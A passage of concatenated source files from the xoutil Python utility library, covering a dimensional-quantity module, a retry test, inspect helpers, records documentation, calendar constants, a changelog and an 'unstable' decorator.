`Dimension`:class: for its canonical unit is simply a\nstring that varies with the name of the dimension and that of the canonical\nunit. This implies that you can *recreate* the same dimension and it will be\ninteroperable with the former::\n\n >>> @Dimension.new\n ... class L:\n ... m = UNIT\n\n >>> m = L.m # Save this\n\n\n >>> # Recreate the same dimension.\n >>> @Dimension.new\n ... class L:\n ... m = UNIT\n\n >>> m == L.m\n True\n\nBoth the dimension name and the canonical unit name *must* be the same for\nthis to work.\n\n.. note:: We advice to define a dimension only once and import it where\n needed.\n\n\"\"\"\n\nimport functools\nimport numbers\n\nfrom xotl.tools.objects import classproperty\n\n\n#: The unit for any kind of quantity.\nUNIT = 1\n\n\[email protected]_ordering\nclass Quantity(numbers.Real):\n \"\"\"A concrete number of `quantity` (expressed in) `units`.\n\n .. seealso:: https://en.wikipedia.org/wiki/Concrete_number\n\n :param quantity: A real number.\n :param units: A `signature <Signature>`:class: for the units the\n denominate the given quantity.\n\n You can construct instances by operating with the attributes of a\n dimension. For instance, this is 5 kilometres:\n\n >>> from xotl.tools.dim.base import L\n >>> 5 * L.km\n 5000::{<Length.metre>}/{}\n\n A concrete number is of the type of its dimension:\n\n >>> isinstance(5 * L.km, L)\n True\n\n \"\"\"\n\n __slots__ = (\"magnitude\", \"signature\")\n\n def __init__(self, quantity, units):\n if not isinstance(quantity, BareReal):\n raise TypeError(\"Quantities must be real numbers\")\n self.magnitude = quantity\n self.signature = units\n\n def __str__(self):\n return \"{}::{}\".format(self.magnitude, self.signature)\n\n __repr__ = __str__\n\n def __neg__(self):\n return type(self)(-self.magnitude, self.signature)\n\n def __pos__(self):\n return type(self)(self.magnitude, self.signature)\n\n def __add__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return type(self)(self.magnitude + other.magnitude, self.signature)\n else:\n # What is the meaning of \"10km + 1\"?\n raise OperandTypeError(\"+\", self, other)\n\n __radd__ = __add__\n\n def __sub__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return type(self)(self.magnitude - other.magnitude, self.signature)\n else:\n # What is the meaning of \"10km - 1\"?\n raise OperandTypeError(\"-\", self, other)\n\n def __mul__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude * other.magnitude, self.signature * other.signature\n )\n )\n else:\n raise OperandTypeError(\"*\", self, other)\n\n __rmul__ = __mul__\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral) and exp != 0:\n if exp < 0:\n return 1 / (self ** (-exp))\n else:\n return type(self)(self.magnitude ** exp, self.signature ** exp)\n else:\n raise OperandTypeError(\"**\", self, exp)\n\n def __div__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude / other.magnitude, self.signature / other.signature\n )\n )\n else:\n raise OperandTypeError(\"/\", self, other)\n\n __truediv__ = __div__\n\n def __floordiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n if isinstance(other, Quantity):\n return downgrade_to_scalar(\n type(self)(\n self.magnitude // other.magnitude, self.signature / other.signature\n )\n )\n else:\n raise OperandTypeError(\"//\", self, other)\n\n def __rdiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n return downgrade_to_scalar(\n type(self)(\n other.magnitude / self.magnitude, other.signature / self.signature\n )\n )\n else:\n raise OperandTypeError(\"/\", other, self)\n\n __rtruediv__ = __rdiv__\n\n def __rfloordiv__(self, other):\n if isinstance(other, BareReal):\n other = type(self)(other, Signature())\n return downgrade_to_scalar(\n type(self)(\n other.magnitude // self.magnitude, other.signature / self.signature\n )\n )\n else:\n raise OperandTypeError(\"//\", other, self)\n\n def __eq__(self, other):\n if isinstance(other, BareReal) and self.signature == SCALAR:\n return self.magnitude == other\n elif isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude == other.magnitude\n else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n def __lt__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude < other.magnitude\n else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n # The following make Quantity more compatible with numbers.Real. In all\n # cases, taking a Quantity for a float takes the magnitude expressed in\n # the canonical unit.\n\n def __le__(self, other):\n if isinstance(other, Quantity) and self.signature == other.signature:\n return self.magnitude <= other.magnitude\n else:\n raise TypeError(\"incomparable quantities: %r and %r\" % (self, other))\n\n def __float__(self):\n return float(self.magnitude)\n\n def __trunc__(self):\n return self.magnitude.__trunc__()\n\n def __abs__(self):\n return abs(self.magnitude)\n\n def __round__(self):\n return round(self.magnitude)\n\n def __ceil__(self):\n import math\n\n return math.ceil(self.magnitude)\n\n def __floor__(self):\n import math\n\n return math.floor(self.magnitude)\n\n def __mod__(self, other):\n if isinstance(other, BareReal):\n return type(self)(self.magnitude % other, self.signature)\n else:\n raise OperandTypeError(\"%\", self, other)\n\n def __rmod__(self, other):\n # This is a rare operation. Imagine: 5 % 2m to be 1/m.... But if I\n # can do 5/2m and that is 2.5/m, then % should be allowed.\n if isinstance(other, BareReal):\n return type(self)(other % self.magnitude, 1 / self.signature)\n else:\n raise OperandTypeError(\"%\", self, other)\n\n def __rpow__(self, other):\n raise OperandTypeError(\"**\", other, self)\n\n\nclass Dimension(type):\n \"\"\"A type for `quantities`_.\n\n This is a metaclass for dimensions. Every instance (class) will\n automatically have the following attributes:\n\n .. attribute:: _unitname_\n\n The name of canonical unit in the dimension. Notice that `aliases\n <new>`:meth: are created after the defined canonical unit. This is the\n name of the attribute provided in the class definition of the dimension\n with value equal to `UNIT`:const:.\n\n .. attribute:: _unit_\n\n The canonical `quantity <Quantity>`:class:. This is the quantity 1\n (`UNIT`:const:) expressed in terms of the canonical unit.\n\n .. attribute:: _signature_\n\n The canonical `signature <Signature>`:class: of the quantities.\n\n It's always true that ``Quantity(UNIT, self._signature_) == self._unit_``.\n\n .. _quantities: https://en.wikipedia.org/wiki/Concrete_numbers\n\n The provided dimension `~xotl.tools.dim.base.Length`:class: has the\n canonical quantity `1 metre`::\n\n >>> Length.metre\n 1::{<Length.metre>}/{}\n\n >>> Length._unit_ == Length.metre == Quantity(1, Length._signature_)\n True\n\n You may subclass `Dimension`:class: and customize the attribute\n ``Quantity``. The value of the attribute **should** be a subclass of\n `~xotl.tools.dim.meta.Quantity`:class: or a callable that returns\n instances of Quantity. You may provide it by fully-qualified name as\n supported by `~xotl.tools.objects.import_object`:func:.\n\n .. versionchanged:: 2.1.0 Added class-attribute Quantity.\n\n \"\"\"\n\n #: Customizable Quantity factory. It must be a callable that takes a\n #: number and a signature, and returns a Quantity-like object.\n Quantity = Quantity\n\n @classproperty\n def _Quantity(self):\n from xotl.tools.objects import import_object\n\n return import_object(self.Quantity)\n\n def __new__(cls, name, bases, attrs):\n wrappedattrs = {}\n Base = next((base for base in bases if isinstance(base, cls)), None)\n if Base is not None:\n unit = Base._unitname_\n signature = Base._signature_\n else:\n unit = None\n signature = Signature()\n for attr, val in attrs.items():\n if isinstance(val, BareReal):\n if val == UNIT and unit is not None:\n raise TypeError(\"quantity with multiple units\")\n if unit is None and val == UNIT:\n unit = attr\n assert not signature.top\n signature.top = (\"<{}.{}>\".format(name, unit),)\n # WARNING: In order to make a single looping structure we\n # intentionally break the signature immutability\n wrappedattrs[attr] = cls._Quantity(val, signature)\n else:\n if unit is None and isinstance(val, Quantity):\n # This is the case when I need to create the quantity from\n # operations. It's is not a public API. We also break\n # the signature immutability here.\n if val.magnitude == UNIT:\n unit = attr\n assert not signature.top and not signature.bottom\n signature.top = val.signature.top\n signature.bottom = val.signature.bottom\n wrappedattrs[attr] = val\n if unit is None:\n raise TypeError(\"dimension without a unit\")\n self = super().__new__(cls, name, bases, wrappedattrs)\n self._unitname_ = unit\n self._unit_ = getattr(self, unit)\n self._signature_ = signature\n return self\n\n @classmethod\n def new(cls, *source, **kwargs):\n \"\"\"Define a new dimension.\n\n This is a wrapped decorator. The actual possible signatures are:\n\n - ``new(unit_alias=None, unit_aliases=None, Quantity=None)(source)``\n\n - ``new(source)``\n\n This allows to use this method as decorator with or without arguments.\n\n :param source: A class with at least the canonical unit definition.\n Other unit definitions will be automatically converted.\n\n :keyword unit_alias: An alias for the canonical unit. You cannot use\n a `source` with several canonical units. This is\n a simple way to introduce a single alias.\n\n :keyword unit_aliases: A sequence with the name of other aliases for\n the canonical unit.\n\n :keyword Quantity: A replacement for the default Quantity of the\n dimension. It defaults to None; which then looks for the\n Quantity attribute the class definition. This allows to\n provide a custom Quantity without having to subclass\n Dimension.\n\n Example:\n\n >>> @Dimension.new(unit_alias='man')\n ... class Workforce:\n ... men = UNIT\n\n >>> Workforce.men == Workforce.man == Workforce._unit_\n True\n\n The resulting class will be an instance of `Dimension`:class::\n\n >>> isinstance(Workforce, Dimension)\n True\n\n The original class is totally missed:\n\n >>> Workforce.mro()\n [...Workforce, object]\n\n To complete the example, let's introduce the dimension Effort that\n expresses the usual amount of men-power and time needed to complete\n some task. However `~xotl.tools.dim.base.Time`:class: has the second\n as it canonical unit, but the standard for Effort is men-hour:\n\n >>> class Effort(Workforce * Time):\n ... # Since the canonical unit of a composed quantity type is\n ... # built from the canonical units of the operands, but the\n ... # true \"canonical type\" of effort is usually men-hour we\n ... # re-introduce it.\n ... men_hour = 60\n\n This does not mean that ``Effort._unit_ == Effort.men_hour``. The\n canonical unit would be ``Effort.men_second``.\n\n .. versionchanged:: 2.1.0 Added keyword parameter Quantity.\n\n \"\"\"\n from xotl.tools.objects import copy_class\n from xotl.tools.decorator.meta import decorator\n\n @decorator\n def _new(source, unit_alias=None, unit_aliases=None, Quantity=None):\n if Quantity is not None:\n\n class meta(cls):\n pass\n\n # Putting this inside the class fail, because 'Quantity =\n # Quantity' cannot be disambiguated with local and non-local\n # name.\n meta.Quantity = Quantity\n else:\n meta = cls\n res = copy_class(source, meta=meta)\n if unit_alias:\n setattr(res, unit_alias, res._unit_)\n if unit_aliases:\n for alias in unit_aliases:\n setattr(res, alias, res._unit_)\n return res\n\n if source and kwargs or len(source) > 1:\n raise TypeError(\"Invalid signature\")\n return _new(*source, **kwargs)\n\n def __instancecheck__(self, instance):\n if isinstance(instance, Quantity):\n return instance.signature == self._signature_\n else:\n return False\n\n def __mul__(self, other):\n if isinstance(other, Dimension):\n name = TIMES(self.__name__, other.__name__)\n if self == other:\n unit = SQUARED(self._unitname_)\n quant = self._Quantity(UNIT, self._signature_ ** 2)\n else:\n unit = TIMES(self._unitname_, other._unitname_)\n quant = self._Quantity(UNIT, self._signature_ * other._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"*\", self, other)\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral):\n if exp == 0:\n return Scalar\n elif exp == 1:\n return self\n elif exp == 2:\n return self * self\n elif exp < 0:\n return 1 / (self ** -exp)\n else:\n assert exp > 0\n name = POWER(self.__name__, exp)\n unit = POWER(self._unitname_, exp)\n quant = self._Quantity(UNIT, self._signature_ ** exp)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"**\", self, exp)\n\n def __div__(self, other):\n if isinstance(other, Dimension):\n if self == other:\n return Scalar\n else:\n name = PER(self.__name__, other.__name__)\n unit = PER(self._unitname_, other._unitname_)\n quant = self._Quantity(UNIT, self._signature_ / other._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"/\", self, other)\n\n __truediv__ = __floordiv__ = __div__\n\n def __rdiv__(self, numerator):\n assert not isinstance(numerator, Dimension)\n if numerator == 1:\n name = PER(\"unit\", self.__name__)\n unit = PER(\"unit\", self._unitname_)\n quant = self._Quantity(UNIT, 1 / self._signature_)\n klass = type(self)\n return klass(name, (object,), {unit: quant})\n else:\n raise OperandTypeError(\"/\", numerator, self)\n\n __rtruediv__ = __rfloordiv__ = __rdiv__\n\n def __eq__(self, other):\n if isinstance(other, Dimension):\n return self._signature_ == other._signature_\n else:\n raise TypeError(\n \"incomparable types '%s' and '%s'\"\n % (type(self).__name__, type(other).__name__)\n )\n\n\nclass Signature:\n \"\"\"The layout of the kinds that compose a quantity.\n\n The layout is given by a pair non-ordered collections (repetition\n is allowed): the numerator (we call it top within the signature)\n and the denominator (bottom).\n\n We represent a signature as ``{top elements}/{bottom elements}``.\n\n You may regard a signature as an abstract 'syntactical' part of a\n quantity. For Length, the ``{metre}/{}`` is the signature of such a\n quantity.\n\n The number \"10\" is not tied to any particular kind of quantity. Bare\n numbers have no kind and the bear the signature ``{}/{}``.\n\n The items of top and bottom are required to be comparable for equality\n (``==``).\n\n You can multiply and divide signatures and simplification happens\n automatically.\n\n You *should* regard signatures as immutable values. In fact, this is kind\n of an internal, but interesting, concept of this module.\n\n Examples::\n\n >>> distance = Signature('m')\n >>> distance\n {m}/{}\n\n >>> time = Signature('s')\n\n >>> freq = 1/time\n >>> freq\n {}/{s}\n\n >>> speed = distance/time\n >>> speed\n {m}/{s}\n\n >>> acceleration = speed/time\n >>> acceleration\n {m}/{s, s}\n\n You may compare signatures for equality.\n\n >>> acceleration == distance/(time*Signature('s'))\n True\n\n >>> speed == distance * freq\n True\n\n Signature don't support neither addition nor subtraction::\n\n >>> distance + distance # doctest: +ELLIPSIS\n Traceback (...)\n ...\n TypeError: unsupported operand type(s) for +: 'Signature' and 'Signature'\n\n \"\"\"\n\n __slots__ = (\"top\", \"bottom\")\n\n def __init__(self, top=None, bottom=None):\n self.top, self.bottom = self.simplify(top, bottom)\n\n def __eq__(self, other):\n try:\n from xotl.tools.future.collections import Counter\n except ImportError:\n from xotl.tools.collections import Counter\n if isinstance(other, type(self)):\n return Counter(self.top) == Counter(other.top) and Counter(\n self.bottom\n ) == Counter(other.bottom)\n else:\n return False\n\n def __ne__(self, other):\n return not (self == other)\n\n __hash__ = None # FIXME: Hash\n\n def __lt__(self, other):\n raise TypeError(\"signatures are not orderable\")\n\n __gt__ = __ge__ = __le__ = __lt__\n\n def __mul__(self, other):\n cls = type(self)\n if other == UNIT:\n return self\n elif isinstance(other, cls):\n return cls(self.top + other.top, self.bottom + other.bottom)\n else:\n raise TypeError\n\n __rmul__ = __mul__\n\n def __div__(self, other):\n cls = type(self)\n if other == UNIT:\n return self\n elif isinstance(other, cls):\n return cls(self.top + other.bottom, self.bottom + other.top)\n else:\n raise TypeError\n\n __truediv__ = __floordiv__ = __div__\n\n def __rdiv__(self, numerator):\n if numerator == UNIT:\n cls = type(self)\n return cls(self.bottom, self.top)\n else:\n raise TypeError\n\n __rtruediv__ = __rfloordiv__ = __rdiv__\n\n def __pow__(self, exp):\n if isinstance(exp, numbers.Integral):\n if exp == 0:\n return Signature()\n elif exp > 0:\n return Signature(self.top * exp, self.bottom * exp)\n else:\n return Signature(self.bottom * -exp, self.top * -exp)\n else:\n raise TypeError\n\n @staticmethod\n def simplify(top, bottom):\n \"\"\"Removes equal items from top and bottom in a one-to-one\n correspondence.\n\n Signatures are simplified on initialization::\n\n >>> Signature('abcxa', 'bxay')\n {c, a}/{y}\n\n This function takes top and bottom and returns simplified\n tuples for top and bottom.\n\n \"\"\"\n top = [] if top is None else list(top)\n bottom = [] if bottom is None else list(bottom)\n i = 0\n while i < len(top):\n j = 0\n while j < len(bottom) and bottom[j] != top[i]:\n j += 1\n if j < len(bottom):\n assert bottom[j] == top[i]\n del bottom[j]\n del top[i]\n else:\n i += 1\n return tuple(top), tuple(bottom)\n\n def __str__(self):\n wrap = lambda s: \"{{{0}}}\".format(s)\n top = wrap(\", \".join(str(t) for t in self.top))\n bottom = wrap(\", \".join(str(b) for b in self.bottom))\n return \"{top}/{bottom}\".format(top=top, bottom=bottom)\n\n __repr__ = __str__\n\n\nclass _BareRealType(type):\n def __instancecheck__(self, i):\n return isinstance(i, numbers.Real) and not isinstance(i, Quantity)\n\n\nclass BareReal(metaclass=_BareRealType):\n \"\"\"Any real that is not a Quantity instance.\"\"\"\n\n\nSCALAR = Signature()\n\n\[email protected]\nclass Scalar:\n \"\"\"A quantity whose signature is always *empty*.\n\n Most of the time you should not deal with this quantity. Any normal\n operation that results in a scalar gets reduced to Python's type:\n\n >>> from xotl.tools.dim.base import L\n >>> L.m/L.m\n 1.0\n\n This type makes the operations on `dimensions <Dimension>`:class: closed\n under multiplication:\n\n >>> Scalar * L == L == L * Scalar\n True\n\n \"\"\"\n\n unit = Quantity(UNIT, SCALAR)\n\n\nTIMES = lambda a, b: \"{}_{}\".format(a, b)\nPER = lambda a, b: \"{}_per_{}\".format(a, b)\nSQUARED = lambda a: \"{}_squared\".format(a)\n\n\ndef POWER(a, e):\n return \"{}_pow_{}\".format(a, e)\n\n\nclass OperandTypeError(TypeError):\n def __init__(self, operand, val1, val2):\n if isinstance(val1, Quantity):\n t1 = val1.signature\n else:\n t1 = type(val1).__name__\n if isinstance(val2, Quantity):\n t2 = val2.signature\n else:\n t2 = type(val2).__name__\n super().__init__(\n \"unsupported operand type(s) for %s: '%s' and '%s'\" % (operand, t1, t2)\n )\n\n\ndef downgrade_to_scalar(quantity):\n \"\"\"Downgrade a concrete number to a bare number if possible.\n\n .. note:: This is not an API of this module.\n\n \"\"\"\n if quantity.signature == SCALAR:\n return quantity.magnitude\n else:\n return quantity\n" }, { "alpha_fraction": 0.5655080080032349, "alphanum_fraction": 0.5902406573295593, "avg_line_length": 24.355932235717773, "blob_id": "c13bfb1861ebf36bc470f8f892f6fa6cb30a233c", "content_id": "cbf9cd577b65acd0bcaa05d078d39759ce32f934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1497, "license_type": "no_license", "max_line_length": 72, "num_lines": 59, "path": "/tests/test_tasking.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.tasking import retry\n\n\nclass FailingMock:\n def __init__(self, start=0, threshold=5, sleeper=0):\n self.start = start\n self.threshold = threshold\n self.sleeper = sleeper\n\n def __call__(self, incr=1):\n if self.sleeper:\n import time\n\n time.sleep(self.sleeper)\n self.start += incr\n if self.start < self.threshold:\n raise ValueError(self.start)\n else:\n return self.start\n\n\ndef test_retrying_max_tries_not_enough_tries():\n fn = FailingMock(threshold=1000000, sleeper=0.5)\n with pytest.raises(ValueError):\n retry(fn, max_tries=3)\n\n\ndef test_retrying_max_tries_enough_tries():\n fn = FailingMock()\n assert retry(fn, max_tries=10) == 5\n\n\ndef test_retrying_max_time_runout():\n fn = FailingMock(threshold=1000000, sleeper=0.2)\n with pytest.raises(ValueError):\n retry(fn, max_time=0.3)\n\n\ndef test_retrying_max_time():\n fn = FailingMock(sleeper=0.2)\n assert retry(fn, max_time=0.2 * 5) == 5\n\n\ndef test_signature():\n fn = FailingMock()\n with pytest.raises(TypeError):\n assert retry(fn, (), {}, 5)\n with pytest.raises(TypeError):\n assert retry(fn, (), {}, x=5)\n" }, { "alpha_fraction": 0.556130588054657, "alphanum_fraction": 0.5581210255622864, "avg_line_length": 28.552940368652344, "blob_id": "dc1db018afbc5dc5395e9146ad30763b55af9777", "content_id": "6b10b559e9a6c89bd0b84c6c085bb5ef4715fefc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5025, "license_type": "no_license", "max_line_length": 78, "num_lines": 170, "path": "/xotl/tools/future/inspect.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's ``inspect`` module.\n\nYou may use it as drop-in replacement of ``inspect``. Although we don't\ndocument all items here. Refer to `inspect's <inspect>`:mod: documentation.\n\n\"\"\"\n\nfrom inspect import * # noqa\nfrom inspect import (\n _sentinel,\n _static_getmro,\n _check_instance, # noqa\n _check_class,\n _is_type,\n _shadowed_dict,\n)\n\n\ndef get_attr_value(obj, name, *default):\n \"\"\"Get a named attribute from an object in a safe way.\n\n Similar to `getattr` but without triggering dynamic look-up via the\n descriptor protocol, `__getattr__` or `__getattribute__` by using\n `getattr_static`:func:.\n\n \"\"\"\n from xotl.tools.params import check_default, Undefined\n\n default = check_default()(*default)\n is_type = isinstance(obj, type)\n res = getattr_static(obj, name, Undefined)\n if isdatadescriptor(res): # noqa\n try:\n owner = type if is_type else type(obj)\n res = res.__get__(obj, owner)\n except Exception: # TODO: @med Which expections.\n res = Undefined\n if res is Undefined and not is_type:\n cls = type(obj)\n res = getattr_static(cls, name, Undefined)\n if isdatadescriptor(res): # noqa\n try:\n res = res.__get__(obj, cls)\n except Exception: # TODO: @med Which?\n try:\n res = res.__get__(cls, type)\n except Exception: # TODO: @med Which?\n res = Undefined\n if res is not Undefined:\n return res\n elif default is not Undefined:\n return default\n else:\n msg = \"'%s' object has no attribute '%s'\"\n raise AttributeError(msg % (type(obj).__name__, name))\n\n\ndef safe_name(obj, affirm=False):\n \"\"\"Return the internal name for a type or a callable.\n\n This function is safe. If :param obj: is not an instance of a proper type\n then returns the following depending on :param affirm:\n\n - If ``False`` returns None.\n\n - If ``True`` convert a single object to its type before returns the name,\n but if is a tuple, list or set; returns a string with a representation\n of contained types.\n\n Examples::\n\n >>> safe_name(int)\n 'int'\n\n >>> safe_name(0) is None\n True\n\n >>> safe_name(0, affirm=True)\n 'int'\n\n >>> safe_name((0, 1.1)) is None\n True\n\n >>> safe_name((0, 1.1), affirm=True)\n '(int, float)'\n\n \"\"\"\n from types import FunctionType, MethodType\n from types import BuiltinFunctionType, BuiltinMethodType\n\n named_types = (\n FunctionType,\n MethodType,\n BuiltinFunctionType,\n BuiltinMethodType,\n type,\n )\n if isinstance(obj, (staticmethod, classmethod)):\n fn = get_attr_value(obj, \"__func__\", None)\n if fn:\n obj = fn\n if isinstance(obj, named_types):\n # TODO: Why not use directly `get_attr_value``\n try:\n res = getattr_static(obj, \"__name__\", None)\n if res:\n if isdatadescriptor(res): # noqa\n res = res.__get__(obj, type)\n except Exception:\n res = None\n if res is None:\n try:\n res = obj.__name__\n except AttributeError:\n res = None\n else:\n res = None\n if res is None:\n # TODO: Why not use directly `get_attr_value``\n # FIX: Improve and standardize the combination of next code\n res = getattr_static(obj, \"__name__\", None)\n if res and isdatadescriptor(res): # noqa\n res = res.__get__(obj, type(obj))\n if isinstance(res, str):\n return res\n elif affirm:\n if isinstance(obj, (tuple, list, set)):\n if isinstance(obj, tuple):\n head, tail = \"()\"\n elif isinstance(obj, list):\n head, tail = \"[]\"\n else:\n head, tail = \"{}\"\n items = \", \".join(safe_name(t, affirm) for t in obj)\n return str(\"%s%s%s\" % (head, items, tail))\n else:\n return safe_name(type(obj))\n else:\n return None\n\n\ndef _static_issubclass(C, B):\n \"\"\"like ``issubclass(C, B) -> bool`` but without using ABCs.\n\n Return whether class C is a strict subclass (i.e., a derived class) of\n class B.\n\n When using a tuple as the second argument it's a shortcut for::\n\n any(_static_issubclass(C, b) for b in B)\n\n This function returns False instead raising \"TypeError: issubclass() arg 2\n must be a class or tuple of classes\" if `B` any tuple member) is not\n instance of `type`.\n\n \"\"\"\n mro = _static_getmro(C)\n if isinstance(B, tuple):\n return any(b in mro for b in B)\n else:\n return B in mro\n" }, { "alpha_fraction": 0.6939102411270142, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 30.72881317138672, "blob_id": "e7b2fcf7ebb55f0a7635c199410133699097fff5", "content_id": "dbdf47909fb62f67b6a958f97b9c90244cd5cfdb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1872, "license_type": "permissive", "max_line_length": 84, "num_lines": 59, "path": "/docs/source/xotl.tools/records.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=================================================\n `xotl.tools.records`:mod: - Records definitions\n=================================================\n\n.. automodule:: xotl.tools.records\n\n.. autoclass:: record\n\n.. _included-readers:\n\nIncluded reader builders\n========================\n\nThe following functions *build* readers for standards types.\n\n.. note:: You cannot use these functions themselves as readers, but you must\n\t call them to obtain the desired reader.\n\nAll these functions have a pair of keywords arguments `nullable` and\n`default`. The argument `nullable` indicates whether the value must be\npresent or not. The function `check_nullable`:func: implements this check and\nallows other to create their own builders with the same semantic.\n\n.. autofunction:: datetime_reader(format, nullable=False, default=None, strict=True)\n\n.. autofunction:: boolean_reader(true=('1', ), nullable=False, default=None)\n\n.. autofunction:: integer_reader(nullable=False, default=None)\n\n.. autofunction:: decimal_reader(nullable=False, default=None)\n\n.. autofunction:: float_reader(nullable=False, default=None)\n\n.. autofunction:: date_reader(format, nullable=False, default=None, strict=True)\n\nChecking for null values\n------------------------\n\n.. autofunction:: isnull\n.. autofunction:: check_nullable(val, nullable)\n\n\nThese couple of functions allows you to define new builders that use the same\nnull concept. For instance, if you need readers that parse dates in diferent\nlocales you may do::\n\n def date_reader(nullable=False, default=None, locale=None):\n\tfrom xotl.tools.records import check_nullable\n\tfrom babel.dates import parse_date, LC_TIME\n\tfrom datetime import datetime\n\tif not locale:\n\t locale = LC_TIME\n\n\tdef reader(value):\n\t if check_nullable(value, nullable):\n\t return parse_date(value, locale=locale)\n\t else:\n\t\treturn default\n\treturn reader\n" }, { "alpha_fraction": 0.5537415146827698, "alphanum_fraction": 0.559183657169342, "avg_line_length": 15.704545021057129, "blob_id": "8a380873a7e46dc0349ab4c58e3567c78b8020af", "content_id": "f4284ef2634a4ab27b1142a34b9226357eb7325e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 736, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/xotl/tools/future/calendar.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `calendar` module.\n\nxotl.tools extensions:\n\n- Settle constants for all months.\n\nOriginal documentation:\n\n\"\"\"\n\nfrom calendar import * # noqa\nimport calendar as _stdlib # noqa\n\n__doc__ += _stdlib.__doc__\n\ntry:\n __all__ = list(_stdlib.__all__)\nexcept AttributeError:\n pass\n\n\n(\n January,\n February,\n March,\n April,\n May,\n June,\n July,\n August,\n September,\n October,\n November,\n December,\n) = range(1, 13)\n" }, { "alpha_fraction": 0.732758641242981, "alphanum_fraction": 0.75, "avg_line_length": 33.79999923706055, "blob_id": "b0eca534d5967520936484e54b8b6de770ca78c0", "content_id": "fa0d04e6d205ce8ff2794ad990fa44215dbf8664", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 348, "license_type": "permissive", "max_line_length": 75, "num_lines": 10, "path": "/docs/source/history/_changes-1.9.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #29: Issues with `xoutil.symbols.symbol`:class: documentation and\n implementation.\n\n- Fix bug #30: It was possible to define a dimension with two (or more)\n incompatible canonical units.\n\n- Fix bug #33: Reusing a context leaves the context unusable.\n\n- Renamed ``xoutil.tasking.StandardWait`` to\n `xoutil.tasking.ConstantWait`:class:.\n" }, { "alpha_fraction": 0.6055264472961426, "alphanum_fraction": 0.6088613867759705, "avg_line_length": 29.420289993286133, "blob_id": "6c69d39c620b016a7528de133f68872e9a25f764", "content_id": "9733c22dfcb105e12438a00bee6f0eb52532d0b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2100, "license_type": "no_license", "max_line_length": 80, "num_lines": 69, "path": "/xotl/tools/decorator/development.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom xotl.tools.decorator.meta import decorator\n\n\n# TODO: move to new module 'xotl.tools.hints' when fully implemented.\n\n\n@decorator\ndef unstable(target, msg=None):\n \"\"\"Declares that a method, class or interface is unstable.\n\n This has the side-effect of issuing a warning the first time the `target`\n is invoked.\n\n The `msg` parameter, if given, should be string that contains, at most,\n two positional replacement fields ({0} and {1}). The first replacement\n field will be the type of `target` (interface, class or function) and the\n second matches `target's` full name.\n\n \"\"\"\n import warnings\n from xotl.tools.names import nameof\n\n if msg is None:\n msg = (\n \"The {0} `{1}` is declared unstable. \"\n \"It may change in the future or be removed.\"\n )\n try:\n from zope.interface import Interface\n except ImportError:\n from xotl.tools.symbols import Ignored as Interface\n if isinstance(target, type(Interface)):\n objtype = \"interface\"\n elif isinstance(target, type):\n objtype = \"class\"\n else:\n objtype = \"function or method\"\n message = msg.format(objtype, nameof(target, inner=True, full=True))\n if isinstance(target, type) or issubclass(type(target), type(Interface)):\n\n class meta(type(target)):\n pass\n\n def new(*args, **kwargs):\n warnings.warn(message, stacklevel=2)\n return target.__new__(*args, **kwargs)\n\n klass = meta(target.__name__, (target,), {\"__new__\": new})\n return klass\n else:\n\n def _unstable(*args, **kwargs):\n message = msg.format(objtype, 